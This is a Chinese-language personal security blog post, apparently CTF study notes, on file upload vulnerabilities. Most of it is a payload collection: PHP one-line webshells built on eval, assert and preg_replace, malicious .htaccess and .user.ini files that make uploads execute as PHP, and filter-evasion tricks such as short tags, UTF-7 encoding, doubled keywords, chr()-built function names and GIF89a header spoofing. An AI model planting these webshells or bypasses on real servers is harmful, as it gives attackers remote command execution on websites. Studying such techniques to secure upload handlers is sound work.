<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>文件上传漏洞 | 七里燃</title><script src="https://cdn.bootcss.com/valine/1.4.4/Valine.min.js"></script><link rel="stylesheet" href="/css/arknights.css"><link rel="stylesheet" href="https://cdn.bootcdn.net/ajax/libs/highlight.js/10.1.2/styles/atom-one-dark-reasonable.min.css"><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><meta name="generator" content="Hexo 5.4.0"></head><body><header><nav><a href="/">Home</a><a href="/archives/">Archives</a></nav></header><main><article><div id="post-bg"><div id="post-title"><h1>文件上传漏洞</h1><hr></div><div id="post-content"><h2 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h2><p>文件上传漏洞是指用户绕过检测，非法上传一个可执行的动态脚本文件，并通过此脚本文件获得了执行服务器端命令的能力。</p>
<p>我们可以利用来执行一句话木马。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php eval($_POST[sb])?&gt;</span><br><span class="line">&lt;?php @eval($_POST[sb])?&gt;  #容错代码</span><br><span class="line">&lt;?php assert($_POST[sb]);?&gt; #使用lanker一句话客户端的专家模式执行相关的php语句</span><br><span class="line">&lt;?$_POST[&#39;sa&#39;]($_POST[&#39;sb&#39;]);?&gt;</span><br><span class="line">&lt;?$_POST[&#39;sa&#39;]($_POST[&#39;sb&#39;],$_POST[&#39;sc&#39;])?&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">@preg_replace(&quot;&#x2F;[email]&#x2F;e&quot;,$_POST[&#39;h&#39;],&quot;error&quot;);</span><br><span class="line">?&gt; #使用这个后,使用菜刀一句话客户端在配置连接的时候在&quot;配置&quot;一栏输入</span><br><span class="line">&lt;O&gt;h&#x3D;@eval($_POST[c]);&lt;&#x2F;O&gt;</span><br><span class="line">&lt;script language&#x3D;&quot;php&quot;&gt;@eval($_POST[sb])&lt;&#x2F;script&gt;</span><br><span class="line">#绕过&lt;?限制的一句话</span><br></pre></td></tr></table></figure>

<h3 id="htaccess任意文件解析"><a href="#htaccess任意文件解析" class="headerlink" title=".htaccess任意文件解析"></a>.htaccess任意文件解析</h3><p>先百度一下，看看什么是.htaccess文件</p>
<blockquote>
<p>.htaccess文件(或者”分布式配置文件”）,全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法， 即，在一个特定的文档目录中放置一个包含一个或多个指令的文件， 以作用于此目录及其所有子目录。作为用户，所能使用的命令受到限制。管理员可以通过Apache的<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/AllowOverride">AllowOverride</a>指令来设置。</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://qlr-0.gitee.io/hhhh/tu/1606637645(1).png"><img src="https://qlr-0.gitee.io/hhhh/tu/1606637645(1).png" alt="1606637645(1)"></a></p>
<p>当apache服务器在上传点处没有限制用户上传.htaccess文件的时候，并开启了.htaccess功能的时候就会出现漏洞。在上传处对shell文件做了一定上传限制却没有限制上传.htaccess文件的时候，我们可以通过上传.htaccess文件，来重新解析我们所要上传文件的后缀名。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application&#x2F;x-httpd-php .aaa</span><br></pre></td></tr></table></figure>

<ul>
<li>这里所有后缀.为.aaa的文件都会被视为php文件，当上传成功后我们就可以访问我们所上传的.aaa文件。</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://qlr-0.gitee.io/hhhh/tu/1606638679(1).png"><img src="https://qlr-0.gitee.io/hhhh/tu/1606638679(1).png" alt="1606638679(1)"></a></p>
<h4 id="htaccess文件换行绕过"><a href="#htaccess文件换行绕过" class="headerlink" title=".htaccess文件换行绕过"></a>.htaccess文件换行绕过</h4><p>当上传的.htaccess文件被过滤时，可以使用换行绕过的方法绕过过滤。</p>
<p>.htaccess支持换行编写所以使用换行可以直接上传成功并解析。</p>
<h3 id="user-ini绕过"><a href="#user-ini绕过" class="headerlink" title=".user.ini绕过"></a>.user.ini绕过</h3><p>若apache服务器在上传点处限制用户上传.htaccess文件，我们可以通过上传.user.ini文件来绕过。</p>
<p>官方解释</p>
<p><a target="_blank" rel="noopener" href="https://qlr-0.gitee.io/hhhh/tu/1606639275(1).png"><img src="https://qlr-0.gitee.io/hhhh/tu/1606639275(1).png" alt="1606639275(1)"></a></p>
<blockquote>
<p><code>.user.ini</code>实际上就是一个可以由用户“自定义”的<code>php.ini</code>，我们可以自定义除了<code>PHP_INI_SYSTEM</code>以外的模式，在执行php代码之前，系统会对<code>.user.ini</code>先做一个执行，然后才执行其他的php文件。</p>
</blockquote>
<p>利用<code>.user,ini</code>先执行<code>auto_prepend_file</code>函数，<code>auto_prepend_file</code>表示在php程序加载第一个php代码前加载的php文件，也就是先加载了<code>1.aaa</code>里面的文件，即一句话木马。</p>
<ul>
<li>1.aaa</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">@eval($_POST[&#39;cmd&#39;]);</span><br></pre></td></tr></table></figure>

<ul>
<li>.user.ini</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">auto_prepend_file&#x3D;1.aaa</span><br></pre></td></tr></table></figure>

<h3 id="短标签绕过"><a href="#短标签绕过" class="headerlink" title="短标签绕过"></a>短标签绕过</h3><p>若<code>&lt;?php</code> 被被过滤，在php5中就可以使用段标签绕过</p>
<ul>
<li>JS风格</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language&#x3D;&quot;php&quot;&gt;phpinfo();&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li>短标签风格</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?&#x3D;phpinfo();?&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li>ASP风格</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;% phpinfo();%&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li>官方默认风格</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php phpinfo(); ?&gt;</span><br></pre></td></tr></table></figure>

<h3 id="特殊编码绕过-UTF-7"><a href="#特殊编码绕过-UTF-7" class="headerlink" title="特殊编码绕过(UTF-7)"></a>特殊编码绕过(UTF-7)</h3><p>如果过滤了所有标签形式P，（PHP7已经将其他标签形式过淘汰，仅剩下<code>&lt;?php</code>形式），这时候可以使用<code>.htaccess</code>解码对应的文件，例如可以使用UTF-7进行绕过。</p>
<p>编码和解码UTF-7：<a target="_blank" rel="noopener" href="https://www.novel.tools/encode/UTF-7">https://www.novel.tools/encode/UTF-7</a></p>
<ul>
<li><p>.htaccess</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">AddType application&#x2F;x-httpd-php .aaa</span><br><span class="line">php_flag display_errors on</span><br><span class="line">php_flag zend.multibyte 1</span><br><span class="line">php_value zend.script_encoding &quot;UTF-7&quot;</span><br></pre></td></tr></table></figure></li>
<li><p><code>&lt;?php @eval($_POST[&#39;cmd&#39;]);</code>UTF-7编码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">+ADw?php +AEA-eval(+ACQAXw-POST+AFs&#39;cmd&#39;+AF0)+ADs?+AD4-</span><br></pre></td></tr></table></figure></li>
<li><p><code>&lt;?php system(&#39;cat /flag&#39;);?&gt;</code>UTF-7编码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">+ADw?php</span><br><span class="line">system(&#39;cat &#x2F;flag&#39;)+ADs</span><br><span class="line">?+AD4-</span><br></pre></td></tr></table></figure></li>
</ul>
<h3 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>双写绕过</h3><p>如果对上传文件的内容中的php，POST，eval替换为空，则我们可以</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;?pphphp</span><br><span class="line">@eevalval($_PPOSTOST[&#39;cmd&#39;]);</span><br></pre></td></tr></table></figure>

<h3 id="动态拼接函数绕过函数过滤"><a href="#动态拼接函数绕过函数过滤" class="headerlink" title="动态拼接函数绕过函数过滤"></a>动态拼接函数绕过函数过滤</h3><p>若对危险函数进行了过滤，不允许上传，则可以使用aiisc码拼接动态构造函数来绕过。</p>
<p>快速生成指定函数脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$a &#x3D; &quot;phpinfo&quot;;</span><br><span class="line">for($i&#x3D;0;$i&lt;strlen($a);$i++)&#123;</span><br><span class="line">	echo &quot;chr(&quot;.ord($a[$i]).&quot;).&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h3 id="图片头绕过"><a href="#图片头绕过" class="headerlink" title="图片头绕过"></a>图片头绕过</h3><p>可以在文件中加入图片文件头配合解析漏洞</p>
<h4 id="XMB文件头绕过"><a href="#XMB文件头绕过" class="headerlink" title="XMB文件头绕过"></a>XMB文件头绕过</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#define test_width 16</span><br><span class="line">#define test_height 7</span><br></pre></td></tr></table></figure>

<h4 id="GIF89a"><a href="#GIF89a" class="headerlink" title="GIF89a"></a>GIF89a</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GIF89a</span><br></pre></td></tr></table></figure>

<p>练习：后续加上。。。。。。</p>
<p>参考链接</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/hxhxhxhxx/article/details/107165508">https://blog.csdn.net/hxhxhxhxx/article/details/107165508</a></p>
<p><a target="_blank" rel="noopener" href="https://www.webshell.cc/2265.html">https://www.webshell.cc/2265.html</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/wjw-zm/p/11803867.html">https://www.cnblogs.com/wjw-zm/p/11803867.html</a></p>
<div id="paginator"></div></div><div id="post-footer"><hr><a href="/2021/03/28/%E5%A4%8D%E7%8E%B0-%E6%88%91TMD%E7%83%A6%E6%AD%BB%E4%BA%86/">← Prev 复现-我TMD烦死了</a><span style="color: #fe2"> | </span><a href="/2021/03/28/%E5%BC%B1%E7%B1%BB%E5%9E%8B%E6%AF%94%E8%BE%83/">弱类型比较 Next →</a><hr></div><div id="bottom-btn"><a id="to-index" href="#post-index" title="index">≡</a><a id="to-top" href="#post-title" title="to top">∧</a></div><div id="Valine"></div><script>new Valine({
 el: '#Valine'
 , appId: ''
 , appKey: ''
 , placeholder: '此条评论委托企鹅物流发送'
})</script></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/"> Dr.qrl-0</a></h1><section id="total"><a id="total-archives" href="/archives"><span class="total-title">Archives Total:</span><span class="total-number">13</span></a><div id="total-tags"><span class="total-title">Tags:</span><span class="total-number">2</span></div><div id="total-categories"><span class="total-title">Categories:</span><span class="total-number">3</span></div></section></div><div id="aside-block"></div><footer><nobr><span class="text-title">©</span><span class="text-content">1970 to 2021</span></nobr><wbr><nobr><span class="text-title">ICP</span><span class="text-content">——备案号——</span></nobr><wbr><wbr><nobr>published with&nbsp;<a target="_blank" rel="noopener" href="http://hexo.io">Hexo&nbsp;</a></nobr><wbr><nobr>Theme&nbsp;<a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknight&nbsp;</a></nobr><wbr><nobr>by&nbsp;<a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/arknights.js"></script><script src="https://cdn.bootcdn.net/ajax/libs/highlight.js/10.1.2/highlight.min.js"></script></body></html>